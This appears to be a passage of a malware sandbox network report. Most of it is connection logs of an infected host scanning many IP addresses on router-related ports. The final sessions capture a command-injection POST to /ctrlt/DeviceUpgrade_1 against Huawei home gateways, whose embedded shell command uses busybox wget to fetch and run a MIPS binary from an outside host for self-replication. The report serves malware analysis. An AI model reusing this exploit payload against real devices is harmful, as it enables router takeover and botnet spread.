                                      Jul 20, 2024 23:01:00.401170969 CEST4980852869192.168.2.23107.208.110.238
                                      Jul 20, 2024 23:01:00.401416063 CEST510948081192.168.2.23100.168.243.228
                                      Jul 20, 2024 23:01:00.401971102 CEST5153437215192.168.2.23157.187.188.100
                                      Jul 20, 2024 23:01:00.404815912 CEST430648081192.168.2.23132.111.233.192
                                      Jul 20, 2024 23:01:00.404815912 CEST430648081192.168.2.23132.111.233.192
                                      Jul 20, 2024 23:01:00.406325102 CEST433848081192.168.2.23132.111.233.192
                                      Jul 20, 2024 23:01:00.407095909 CEST808150770100.168.243.228192.168.2.23
                                      Jul 20, 2024 23:01:00.407140970 CEST805410088.179.132.46192.168.2.23
                                      Jul 20, 2024 23:01:00.407222986 CEST5410080192.168.2.2388.179.132.46
                                      Jul 20, 2024 23:01:00.407440901 CEST808151094100.168.243.228192.168.2.23
                                      Jul 20, 2024 23:01:00.407457113 CEST3721551534157.187.188.100192.168.2.23
                                      Jul 20, 2024 23:01:00.407485008 CEST5153437215192.168.2.23157.187.188.100
                                      Jul 20, 2024 23:01:00.407601118 CEST510948081192.168.2.23100.168.243.228
                                      Jul 20, 2024 23:01:00.407701969 CEST3767852869192.168.2.23104.75.200.235
                                      Jul 20, 2024 23:01:00.407726049 CEST5354037215192.168.2.23197.36.116.167
                                      Jul 20, 2024 23:01:00.408324003 CEST543988081192.168.2.23202.129.62.180
                                      Jul 20, 2024 23:01:00.408324003 CEST543988081192.168.2.23202.129.62.180
                                      Jul 20, 2024 23:01:00.410427094 CEST5560880192.168.2.2388.197.195.111
                                      Jul 20, 2024 23:01:00.410523891 CEST547208081192.168.2.23202.129.62.180
                                      Jul 20, 2024 23:01:00.411248922 CEST808143064132.111.233.192192.168.2.23
                                      Jul 20, 2024 23:01:00.412009954 CEST808143384132.111.233.192192.168.2.23
                                      Jul 20, 2024 23:01:00.412050962 CEST433848081192.168.2.23132.111.233.192
                                      Jul 20, 2024 23:01:00.412509918 CEST3512037215192.168.2.23197.173.93.85
                                      Jul 20, 2024 23:01:00.413341045 CEST571268081192.168.2.23221.218.195.172
                                      Jul 20, 2024 23:01:00.413341045 CEST571268081192.168.2.23221.218.195.172
                                      Jul 20, 2024 23:01:00.413605928 CEST3721553540197.36.116.167192.168.2.23
                                      Jul 20, 2024 23:01:00.413650036 CEST5354037215192.168.2.23197.36.116.167
                                      Jul 20, 2024 23:01:00.413697004 CEST5286937678104.75.200.235192.168.2.23
                                      Jul 20, 2024 23:01:00.413710117 CEST808154398202.129.62.180192.168.2.23
                                      Jul 20, 2024 23:01:00.413846016 CEST3767852869192.168.2.23104.75.200.235
                                      Jul 20, 2024 23:01:00.414731026 CEST574448081192.168.2.23221.218.195.172
                                      Jul 20, 2024 23:01:00.416119099 CEST3709452869192.168.2.23185.31.200.232
                                      Jul 20, 2024 23:01:00.417058945 CEST406448081192.168.2.23212.120.55.123
                                      Jul 20, 2024 23:01:00.417058945 CEST406448081192.168.2.23212.120.55.123
                                      Jul 20, 2024 23:01:00.417222977 CEST805560888.197.195.111192.168.2.23
                                      Jul 20, 2024 23:01:00.417262077 CEST5560880192.168.2.2388.197.195.111
                                      Jul 20, 2024 23:01:00.417318106 CEST808154720202.129.62.180192.168.2.23
                                      Jul 20, 2024 23:01:00.417325020 CEST3994037215192.168.2.23197.175.112.209
                                      Jul 20, 2024 23:01:00.417435884 CEST547208081192.168.2.23202.129.62.180
                                      Jul 20, 2024 23:01:00.417856932 CEST3721535120197.173.93.85192.168.2.23
                                      Jul 20, 2024 23:01:00.417886972 CEST3512037215192.168.2.23197.173.93.85
                                      Jul 20, 2024 23:01:00.418593884 CEST808157126221.218.195.172192.168.2.23
                                      Jul 20, 2024 23:01:00.419440985 CEST5726080192.168.2.2388.192.183.80
                                      Jul 20, 2024 23:01:00.419567108 CEST409648081192.168.2.23212.120.55.123
                                      Jul 20, 2024 23:01:00.419998884 CEST808157444221.218.195.172192.168.2.23
                                      Jul 20, 2024 23:01:00.420037031 CEST574448081192.168.2.23221.218.195.172
                                      Jul 20, 2024 23:01:00.421144962 CEST5286937094185.31.200.232192.168.2.23
                                      Jul 20, 2024 23:01:00.421180964 CEST3709452869192.168.2.23185.31.200.232
                                      Jul 20, 2024 23:01:00.421997070 CEST435448081192.168.2.2388.53.96.249
                                      Jul 20, 2024 23:01:00.421997070 CEST435448081192.168.2.2388.53.96.249
                                      Jul 20, 2024 23:01:00.422158003 CEST808140644212.120.55.123192.168.2.23
                                      Jul 20, 2024 23:01:00.422399998 CEST3731037215192.168.2.23157.115.23.92
                                      Jul 20, 2024 23:01:00.422415018 CEST3721539940197.175.112.209192.168.2.23
                                      Jul 20, 2024 23:01:00.422451019 CEST3994037215192.168.2.23197.175.112.209
                                      Jul 20, 2024 23:01:00.423414946 CEST438588081192.168.2.2388.53.96.249
                                      Jul 20, 2024 23:01:00.424458027 CEST805726088.192.183.80192.168.2.23
                                      Jul 20, 2024 23:01:00.424498081 CEST5726080192.168.2.2388.192.183.80
                                      Jul 20, 2024 23:01:00.424757004 CEST5900652869192.168.2.23147.69.83.159
                                      Jul 20, 2024 23:01:00.424767971 CEST808140964212.120.55.123192.168.2.23
                                      Jul 20, 2024 23:01:00.424812078 CEST409648081192.168.2.23212.120.55.123
                                      Jul 20, 2024 23:01:00.425695896 CEST495208081192.168.2.2379.211.170.14
                                      Jul 20, 2024 23:01:00.425695896 CEST495208081192.168.2.2379.211.170.14
                                      Jul 20, 2024 23:01:00.426975012 CEST80814354488.53.96.249192.168.2.23
                                      Jul 20, 2024 23:01:00.427311897 CEST4683637215192.168.2.23197.236.128.48
                                      Jul 20, 2024 23:01:00.427392006 CEST3721537310157.115.23.92192.168.2.23
                                      Jul 20, 2024 23:01:00.427511930 CEST3731037215192.168.2.23157.115.23.92
                                      Jul 20, 2024 23:01:00.428044081 CEST4158680192.168.2.2388.197.34.97
                                      Jul 20, 2024 23:01:00.428375959 CEST498368081192.168.2.2379.211.170.14
                                      Jul 20, 2024 23:01:00.428520918 CEST80814385888.53.96.249192.168.2.23
                                      Jul 20, 2024 23:01:00.428656101 CEST438588081192.168.2.2388.53.96.249
                                      Jul 20, 2024 23:01:00.429907084 CEST5286959006147.69.83.159192.168.2.23
                                      Jul 20, 2024 23:01:00.430052042 CEST5900652869192.168.2.23147.69.83.159
                                      Jul 20, 2024 23:01:00.430166006 CEST360848081192.168.2.23213.137.199.164
                                      Jul 20, 2024 23:01:00.430166006 CEST360848081192.168.2.23213.137.199.164
                                      Jul 20, 2024 23:01:00.430784941 CEST80814952079.211.170.14192.168.2.23
                                      Jul 20, 2024 23:01:00.431065083 CEST363948081192.168.2.23213.137.199.164
                                      Jul 20, 2024 23:01:00.431596994 CEST5699637215192.168.2.2341.39.168.222
                                      Jul 20, 2024 23:01:00.431838036 CEST80815064451.195.238.25192.168.2.23
                                      Jul 20, 2024 23:01:00.431935072 CEST506448081192.168.2.2351.195.238.25
                                      Jul 20, 2024 23:01:00.432521105 CEST5485452869192.168.2.23164.236.243.93
                                      Jul 20, 2024 23:01:00.432686090 CEST3721546836197.236.128.48192.168.2.23
                                      Jul 20, 2024 23:01:00.432732105 CEST4683637215192.168.2.23197.236.128.48
                                      Jul 20, 2024 23:01:00.433248997 CEST407548081192.168.2.2348.252.220.101
                                      Jul 20, 2024 23:01:00.433248997 CEST407548081192.168.2.2348.252.220.101
                                      Jul 20, 2024 23:01:00.433381081 CEST804158688.197.34.97192.168.2.23
                                      Jul 20, 2024 23:01:00.433427095 CEST4158680192.168.2.2388.197.34.97
                                      Jul 20, 2024 23:01:00.433518887 CEST80814983679.211.170.14192.168.2.23
                                      Jul 20, 2024 23:01:00.433754921 CEST498368081192.168.2.2379.211.170.14
                                      Jul 20, 2024 23:01:00.435180902 CEST5145680192.168.2.2388.155.56.167
                                      Jul 20, 2024 23:01:00.435267925 CEST410648081192.168.2.2348.252.220.101
                                      Jul 20, 2024 23:01:00.435359001 CEST808136084213.137.199.164192.168.2.23
                                      Jul 20, 2024 23:01:00.435849905 CEST5986237215192.168.2.23197.92.38.185
                                      Jul 20, 2024 23:01:00.436178923 CEST808136394213.137.199.164192.168.2.23
                                      Jul 20, 2024 23:01:00.436213970 CEST363948081192.168.2.23213.137.199.164
                                      Jul 20, 2024 23:01:00.436682940 CEST372155699641.39.168.222192.168.2.23
                                      Jul 20, 2024 23:01:00.436744928 CEST5699637215192.168.2.2341.39.168.222
                                      Jul 20, 2024 23:01:00.437361956 CEST551168081192.168.2.23114.223.71.65
                                      Jul 20, 2024 23:01:00.437361956 CEST551168081192.168.2.23114.223.71.65
                                      Jul 20, 2024 23:01:00.437787056 CEST5286954854164.236.243.93192.168.2.23
                                      Jul 20, 2024 23:01:00.437927961 CEST5485452869192.168.2.23164.236.243.93
                                      Jul 20, 2024 23:01:00.438242912 CEST80814075448.252.220.101192.168.2.23
                                      Jul 20, 2024 23:01:00.438472033 CEST554228081192.168.2.23114.223.71.65
                                      Jul 20, 2024 23:01:00.439769983 CEST5694052869192.168.2.23170.225.184.185
                                      Jul 20, 2024 23:01:00.439898968 CEST6058437215192.168.2.2341.215.110.81
                                      Jul 20, 2024 23:01:00.440315008 CEST805145688.155.56.167192.168.2.23
                                      Jul 20, 2024 23:01:00.440356970 CEST5145680192.168.2.2388.155.56.167
                                      Jul 20, 2024 23:01:00.440583944 CEST332308081192.168.2.235.251.164.105
                                      Jul 20, 2024 23:01:00.440583944 CEST332308081192.168.2.235.251.164.105
                                      Jul 20, 2024 23:01:00.440826893 CEST80814106448.252.220.101192.168.2.23
                                      Jul 20, 2024 23:01:00.440855980 CEST410648081192.168.2.2348.252.220.101
                                      Jul 20, 2024 23:01:00.441350937 CEST3721559862197.92.38.185192.168.2.23
                                      Jul 20, 2024 23:01:00.441390038 CEST5986237215192.168.2.23197.92.38.185
                                      Jul 20, 2024 23:01:00.442436934 CEST808155116114.223.71.65192.168.2.23
                                      Jul 20, 2024 23:01:00.442774057 CEST4206480192.168.2.2388.153.34.9
                                      Jul 20, 2024 23:01:00.443139076 CEST335388081192.168.2.235.251.164.105
                                      Jul 20, 2024 23:01:00.444013119 CEST808155422114.223.71.65192.168.2.23
                                      Jul 20, 2024 23:01:00.444174051 CEST554228081192.168.2.23114.223.71.65
                                      Jul 20, 2024 23:01:00.444174051 CEST4516437215192.168.2.2341.244.169.9
                                      Jul 20, 2024 23:01:00.444988966 CEST5286956940170.225.184.185192.168.2.23
                                      Jul 20, 2024 23:01:00.445027113 CEST5694052869192.168.2.23170.225.184.185
                                      Jul 20, 2024 23:01:00.445298910 CEST372156058441.215.110.81192.168.2.23
                                      Jul 20, 2024 23:01:00.445341110 CEST6058437215192.168.2.2341.215.110.81
                                      Jul 20, 2024 23:01:00.445363045 CEST551748081192.168.2.23188.250.198.110
                                      Jul 20, 2024 23:01:00.445363045 CEST551748081192.168.2.23188.250.198.110
                                      Jul 20, 2024 23:01:00.445647955 CEST8081332305.251.164.105192.168.2.23
                                      Jul 20, 2024 23:01:00.446657896 CEST554788081192.168.2.23188.250.198.110
                                      Jul 20, 2024 23:01:00.448103905 CEST804206488.153.34.9192.168.2.23
                                      Jul 20, 2024 23:01:00.448122025 CEST4424052869192.168.2.23153.94.71.254
                                      Jul 20, 2024 23:01:00.448230028 CEST4206480192.168.2.2388.153.34.9
                                      Jul 20, 2024 23:01:00.448498011 CEST8081335385.251.164.105192.168.2.23
                                      Jul 20, 2024 23:01:00.448540926 CEST335388081192.168.2.235.251.164.105
                                      Jul 20, 2024 23:01:00.448681116 CEST808150770100.168.243.228192.168.2.23
                                      Jul 20, 2024 23:01:00.449078083 CEST530848081192.168.2.232.135.159.238
                                      Jul 20, 2024 23:01:00.449078083 CEST530848081192.168.2.232.135.159.238
                                      Jul 20, 2024 23:01:00.449301958 CEST5773637215192.168.2.2341.242.166.123
                                      Jul 20, 2024 23:01:00.450365067 CEST372154516441.244.169.9192.168.2.23
                                      Jul 20, 2024 23:01:00.450417995 CEST4516437215192.168.2.2341.244.169.9
                                      Jul 20, 2024 23:01:00.450460911 CEST4706880192.168.2.2388.147.238.16
                                      Jul 20, 2024 23:01:00.450573921 CEST533888081192.168.2.232.135.159.238
                                      Jul 20, 2024 23:01:00.451494932 CEST808155174188.250.198.110192.168.2.23
                                      Jul 20, 2024 23:01:00.451905966 CEST808155478188.250.198.110192.168.2.23
                                      Jul 20, 2024 23:01:00.451942921 CEST554788081192.168.2.23188.250.198.110
                                      Jul 20, 2024 23:01:00.452296019 CEST609628081192.168.2.2388.227.232.46
                                      Jul 20, 2024 23:01:00.452296972 CEST609628081192.168.2.2388.227.232.46
                                      Jul 20, 2024 23:01:00.452569962 CEST5485437215192.168.2.23157.21.145.183
                                      Jul 20, 2024 23:01:00.452590942 CEST808143064132.111.233.192192.168.2.23
                                      Jul 20, 2024 23:01:00.453155994 CEST5286944240153.94.71.254192.168.2.23
                                      Jul 20, 2024 23:01:00.453202009 CEST4424052869192.168.2.23153.94.71.254
                                      Jul 20, 2024 23:01:00.453445911 CEST330308081192.168.2.2388.227.232.46
                                      Jul 20, 2024 23:01:00.454086065 CEST8081530842.135.159.238192.168.2.23
                                      Jul 20, 2024 23:01:00.454369068 CEST372155773641.242.166.123192.168.2.23
                                      Jul 20, 2024 23:01:00.454407930 CEST5773637215192.168.2.2341.242.166.123
                                      Jul 20, 2024 23:01:00.454823971 CEST6085852869192.168.2.2386.219.42.227
                                      Jul 20, 2024 23:01:00.455595016 CEST456688081192.168.2.23111.130.255.185
                                      Jul 20, 2024 23:01:00.455595016 CEST456688081192.168.2.23111.130.255.185
                                      Jul 20, 2024 23:01:00.455847979 CEST804706888.147.238.16192.168.2.23
                                      Jul 20, 2024 23:01:00.455885887 CEST4706880192.168.2.2388.147.238.16
                                      Jul 20, 2024 23:01:00.456423044 CEST8081533882.135.159.238192.168.2.23
                                      Jul 20, 2024 23:01:00.456491947 CEST533888081192.168.2.232.135.159.238
                                      Jul 20, 2024 23:01:00.456607103 CEST808154398202.129.62.180192.168.2.23
                                      Jul 20, 2024 23:01:00.457000971 CEST6067437215192.168.2.23157.114.148.67
                                      Jul 20, 2024 23:01:00.457536936 CEST5434480192.168.2.2388.11.70.93
                                      Jul 20, 2024 23:01:00.457540035 CEST80816096288.227.232.46192.168.2.23
                                      Jul 20, 2024 23:01:00.457775116 CEST459688081192.168.2.23111.130.255.185
                                      Jul 20, 2024 23:01:00.458388090 CEST3721554854157.21.145.183192.168.2.23
                                      Jul 20, 2024 23:01:00.458426952 CEST5485437215192.168.2.23157.21.145.183
                                      Jul 20, 2024 23:01:00.458770037 CEST80813303088.227.232.46192.168.2.23
                                      Jul 20, 2024 23:01:00.458812952 CEST330308081192.168.2.2388.227.232.46
                                      Jul 20, 2024 23:01:00.459834099 CEST433948081192.168.2.2339.240.140.73
                                      Jul 20, 2024 23:01:00.459834099 CEST433948081192.168.2.2339.240.140.73
                                      Jul 20, 2024 23:01:00.460498095 CEST528696085886.219.42.227192.168.2.23
                                      Jul 20, 2024 23:01:00.460537910 CEST6085852869192.168.2.2386.219.42.227
                                      Jul 20, 2024 23:01:00.460633039 CEST808157126221.218.195.172192.168.2.23
                                      Jul 20, 2024 23:01:00.461039066 CEST808145668111.130.255.185192.168.2.23
                                      Jul 20, 2024 23:01:00.461415052 CEST436888081192.168.2.2339.240.140.73
                                      Jul 20, 2024 23:01:00.461703062 CEST4291237215192.168.2.23156.90.210.240
                                      Jul 20, 2024 23:01:00.462253094 CEST3721560674157.114.148.67192.168.2.23
                                      Jul 20, 2024 23:01:00.462297916 CEST6067437215192.168.2.23157.114.148.67
                                      Jul 20, 2024 23:01:00.462563038 CEST5782452869192.168.2.2343.227.14.32
                                      Jul 20, 2024 23:01:00.462567091 CEST805434488.11.70.93192.168.2.23
                                      Jul 20, 2024 23:01:00.462600946 CEST5434480192.168.2.2388.11.70.93
                                      Jul 20, 2024 23:01:00.463507891 CEST511388081192.168.2.23108.204.100.190
                                      Jul 20, 2024 23:01:00.463509083 CEST511388081192.168.2.23108.204.100.190
                                      Jul 20, 2024 23:01:00.463665009 CEST808145968111.130.255.185192.168.2.23
                                      Jul 20, 2024 23:01:00.464195013 CEST459688081192.168.2.23111.130.255.185
                                      Jul 20, 2024 23:01:00.464607954 CEST808140644212.120.55.123192.168.2.23
                                      Jul 20, 2024 23:01:00.464970112 CEST80814339439.240.140.73192.168.2.23
                                      Jul 20, 2024 23:01:00.465682983 CEST5520280192.168.2.2388.38.39.40
                                      Jul 20, 2024 23:01:00.465779066 CEST514328081192.168.2.23108.204.100.190
                                      Jul 20, 2024 23:01:00.466387987 CEST3842437215192.168.2.2341.90.83.142
                                      Jul 20, 2024 23:01:00.466480017 CEST80814368839.240.140.73192.168.2.23
                                      Jul 20, 2024 23:01:00.466511011 CEST436888081192.168.2.2339.240.140.73
                                      Jul 20, 2024 23:01:00.466952085 CEST3721542912156.90.210.240192.168.2.23
                                      Jul 20, 2024 23:01:00.467128992 CEST4291237215192.168.2.23156.90.210.240
                                      Jul 20, 2024 23:01:00.467807055 CEST528695782443.227.14.32192.168.2.23
                                      Jul 20, 2024 23:01:00.467847109 CEST5782452869192.168.2.2343.227.14.32
                                      Jul 20, 2024 23:01:00.468168974 CEST361328081192.168.2.2351.75.205.142
                                      Jul 20, 2024 23:01:00.468168974 CEST361328081192.168.2.2351.75.205.142
                                      Jul 20, 2024 23:01:00.468828917 CEST80814354488.53.96.249192.168.2.23
                                      Jul 20, 2024 23:01:00.469153881 CEST364228081192.168.2.2351.75.205.142
                                      Jul 20, 2024 23:01:00.469157934 CEST808151138108.204.100.190192.168.2.23
                                      Jul 20, 2024 23:01:00.470315933 CEST4932052869192.168.2.23154.97.74.140
                                      Jul 20, 2024 23:01:00.470432997 CEST4895637215192.168.2.2341.95.27.201
                                      Jul 20, 2024 23:01:00.470758915 CEST805520288.38.39.40192.168.2.23
                                      Jul 20, 2024 23:01:00.470798016 CEST5520280192.168.2.2388.38.39.40
                                      Jul 20, 2024 23:01:00.471249104 CEST808151432108.204.100.190192.168.2.23
                                      Jul 20, 2024 23:01:00.471298933 CEST514328081192.168.2.23108.204.100.190
                                      Jul 20, 2024 23:01:00.471431017 CEST460708081192.168.2.23182.180.214.71
                                      Jul 20, 2024 23:01:00.471431017 CEST460708081192.168.2.23182.180.214.71
                                      Jul 20, 2024 23:01:00.472378016 CEST372153842441.90.83.142192.168.2.23
                                      Jul 20, 2024 23:01:00.472492933 CEST3842437215192.168.2.2341.90.83.142
                                      Jul 20, 2024 23:01:00.473052025 CEST5678680192.168.2.2388.68.111.58
                                      Jul 20, 2024 23:01:00.473159075 CEST463628081192.168.2.23182.180.214.71
                                      Jul 20, 2024 23:01:00.473314047 CEST80813613251.75.205.142192.168.2.23
                                      Jul 20, 2024 23:01:00.474737883 CEST80813642251.75.205.142192.168.2.23
                                      Jul 20, 2024 23:01:00.474786997 CEST4736837215192.168.2.23197.224.26.246
                                      Jul 20, 2024 23:01:00.474881887 CEST364228081192.168.2.2351.75.205.142
                                      Jul 20, 2024 23:01:00.475337982 CEST5286949320154.97.74.140192.168.2.23
                                      Jul 20, 2024 23:01:00.475501060 CEST575728081192.168.2.2334.165.154.242
                                      Jul 20, 2024 23:01:00.475501060 CEST575728081192.168.2.2334.165.154.242
                                      Jul 20, 2024 23:01:00.475509882 CEST4932052869192.168.2.23154.97.74.140
                                      Jul 20, 2024 23:01:00.476356983 CEST372154895641.95.27.201192.168.2.23
                                      Jul 20, 2024 23:01:00.476492882 CEST4895637215192.168.2.2341.95.27.201
                                      Jul 20, 2024 23:01:00.476731062 CEST808136084213.137.199.164192.168.2.23
                                      Jul 20, 2024 23:01:00.476742983 CEST80814952079.211.170.14192.168.2.23
                                      Jul 20, 2024 23:01:00.476950884 CEST808146070182.180.214.71192.168.2.23
                                      Jul 20, 2024 23:01:00.476999998 CEST578608081192.168.2.2334.165.154.242
                                      Jul 20, 2024 23:01:00.478094101 CEST805678688.68.111.58192.168.2.23
                                      Jul 20, 2024 23:01:00.478128910 CEST5678680192.168.2.2388.68.111.58
                                      Jul 20, 2024 23:01:00.478359938 CEST3542052869192.168.2.2368.46.168.107
                                      Jul 20, 2024 23:01:00.478858948 CEST808146362182.180.214.71192.168.2.23
                                      Jul 20, 2024 23:01:00.478910923 CEST463628081192.168.2.23182.180.214.71
                                      Jul 20, 2024 23:01:00.479446888 CEST339268081192.168.2.23219.54.135.72
                                      Jul 20, 2024 23:01:00.479446888 CEST339268081192.168.2.23219.54.135.72
                                      Jul 20, 2024 23:01:00.479712009 CEST3505837215192.168.2.23105.15.118.157
                                      Jul 20, 2024 23:01:00.480169058 CEST3721547368197.224.26.246192.168.2.23
                                      Jul 20, 2024 23:01:00.480216026 CEST4736837215192.168.2.23197.224.26.246
                                      Jul 20, 2024 23:01:00.480782986 CEST80814075448.252.220.101192.168.2.23
                                      Jul 20, 2024 23:01:00.480858088 CEST80815757234.165.154.242192.168.2.23
                                      Jul 20, 2024 23:01:00.481374025 CEST5419880192.168.2.2388.151.51.17
                                      Jul 20, 2024 23:01:00.481477976 CEST342168081192.168.2.23219.54.135.72
                                      Jul 20, 2024 23:01:00.482336998 CEST80815786034.165.154.242192.168.2.23
                                      Jul 20, 2024 23:01:00.482507944 CEST578608081192.168.2.2334.165.154.242
                                      Jul 20, 2024 23:01:00.483392954 CEST528693542068.46.168.107192.168.2.23
                                      Jul 20, 2024 23:01:00.483443022 CEST3542052869192.168.2.2368.46.168.107
                                      Jul 20, 2024 23:01:00.483752012 CEST568008081192.168.2.2389.224.68.64
                                      Jul 20, 2024 23:01:00.483752012 CEST568008081192.168.2.2389.224.68.64
                                      Jul 20, 2024 23:01:00.484255075 CEST4226037215192.168.2.2341.112.123.1
                                      Jul 20, 2024 23:01:00.484498024 CEST808133926219.54.135.72192.168.2.23
                                      Jul 20, 2024 23:01:00.484883070 CEST808155116114.223.71.65192.168.2.23
                                      Jul 20, 2024 23:01:00.484942913 CEST3721535058105.15.118.157192.168.2.23
                                      Jul 20, 2024 23:01:00.484987020 CEST3505837215192.168.2.23105.15.118.157
                                      Jul 20, 2024 23:01:00.485398054 CEST570848081192.168.2.2389.224.68.64
                                      Jul 20, 2024 23:01:00.486362934 CEST3961052869192.168.2.23119.8.134.128
                                      Jul 20, 2024 23:01:00.486644983 CEST805419888.151.51.17192.168.2.23
                                      Jul 20, 2024 23:01:00.486684084 CEST5419880192.168.2.2388.151.51.17
                                      Jul 20, 2024 23:01:00.486752987 CEST808134216219.54.135.72192.168.2.23
                                      Jul 20, 2024 23:01:00.486784935 CEST342168081192.168.2.23219.54.135.72
                                      Jul 20, 2024 23:01:00.487246037 CEST379428081192.168.2.23155.103.57.93
                                      Jul 20, 2024 23:01:00.487246037 CEST379428081192.168.2.23155.103.57.93
                                      Jul 20, 2024 23:01:00.488604069 CEST8081332305.251.164.105192.168.2.23
                                      Jul 20, 2024 23:01:00.488724947 CEST3398437215192.168.2.2341.137.58.228
                                      Jul 20, 2024 23:01:00.488790035 CEST80815680089.224.68.64192.168.2.23
                                      Jul 20, 2024 23:01:00.489366055 CEST5606480192.168.2.2388.35.165.7
                                      Jul 20, 2024 23:01:00.489377975 CEST382288081192.168.2.23155.103.57.93
                                      Jul 20, 2024 23:01:00.489589930 CEST372154226041.112.123.1192.168.2.23
                                      Jul 20, 2024 23:01:00.489629984 CEST4226037215192.168.2.2341.112.123.1
                                      Jul 20, 2024 23:01:00.490639925 CEST80815708489.224.68.64192.168.2.23
                                      Jul 20, 2024 23:01:00.490783930 CEST570848081192.168.2.2389.224.68.64
                                      Jul 20, 2024 23:01:00.491755009 CEST5286939610119.8.134.128192.168.2.23
                                      Jul 20, 2024 23:01:00.491795063 CEST3961052869192.168.2.23119.8.134.128
                                      Jul 20, 2024 23:01:00.491946936 CEST527228081192.168.2.23166.54.160.22
                                      Jul 20, 2024 23:01:00.491946936 CEST527228081192.168.2.23166.54.160.22
                                      Jul 20, 2024 23:01:00.492408037 CEST808137942155.103.57.93192.168.2.23
                                      Jul 20, 2024 23:01:00.493272066 CEST530028081192.168.2.23166.54.160.22
                                      Jul 20, 2024 23:01:00.493616104 CEST3669837215192.168.2.23157.83.139.204
                                      Jul 20, 2024 23:01:00.493913889 CEST808155174188.250.198.110192.168.2.23
                                      Jul 20, 2024 23:01:00.494023085 CEST372153398441.137.58.228192.168.2.23
                                      Jul 20, 2024 23:01:00.494060993 CEST3398437215192.168.2.2341.137.58.228
                                      Jul 20, 2024 23:01:00.494487047 CEST805606488.35.165.7192.168.2.23
                                      Jul 20, 2024 23:01:00.494529963 CEST5606480192.168.2.2388.35.165.7
                                      Jul 20, 2024 23:01:00.494679928 CEST5751252869192.168.2.23151.194.118.37
                                      Jul 20, 2024 23:01:00.495554924 CEST468668081192.168.2.23113.225.23.155
                                      Jul 20, 2024 23:01:00.495554924 CEST468668081192.168.2.23113.225.23.155
                                      Jul 20, 2024 23:01:00.495683908 CEST808138228155.103.57.93192.168.2.23
                                      Jul 20, 2024 23:01:00.495862007 CEST382288081192.168.2.23155.103.57.93
                                      Jul 20, 2024 23:01:00.496822119 CEST8081530842.135.159.238192.168.2.23
                                      Jul 20, 2024 23:01:00.497196913 CEST808152722166.54.160.22192.168.2.23
                                      Jul 20, 2024 23:01:00.497468948 CEST4514680192.168.2.2388.155.58.50
                                      Jul 20, 2024 23:01:00.497716904 CEST471468081192.168.2.23113.225.23.155
                                      Jul 20, 2024 23:01:00.497947931 CEST3653637215192.168.2.23157.118.19.128
                                      Jul 20, 2024 23:01:00.498434067 CEST808153002166.54.160.22192.168.2.23
                                      Jul 20, 2024 23:01:00.498478889 CEST530028081192.168.2.23166.54.160.22
                                      Jul 20, 2024 23:01:00.498884916 CEST3721536698157.83.139.204192.168.2.23
                                      Jul 20, 2024 23:01:00.499011993 CEST3669837215192.168.2.23157.83.139.204
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jul 20, 2024 23:00:56.816505909 CEST192.168.2.238.8.8.80xd134Standard query (0)vector.mineheaven.orgA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jul 20, 2024 23:00:56.829720974 CEST8.8.8.8192.168.2.230xd134No error (0)vector.mineheaven.org15.235.203.214A (IP address)IN (0x0001)false
                                      Session IDSource IPSource PortDestination IPDestination Port
                                      0192.168.2.2336734157.189.55.13537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220685005 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1192.168.2.2348860157.115.56.9537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220817089 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
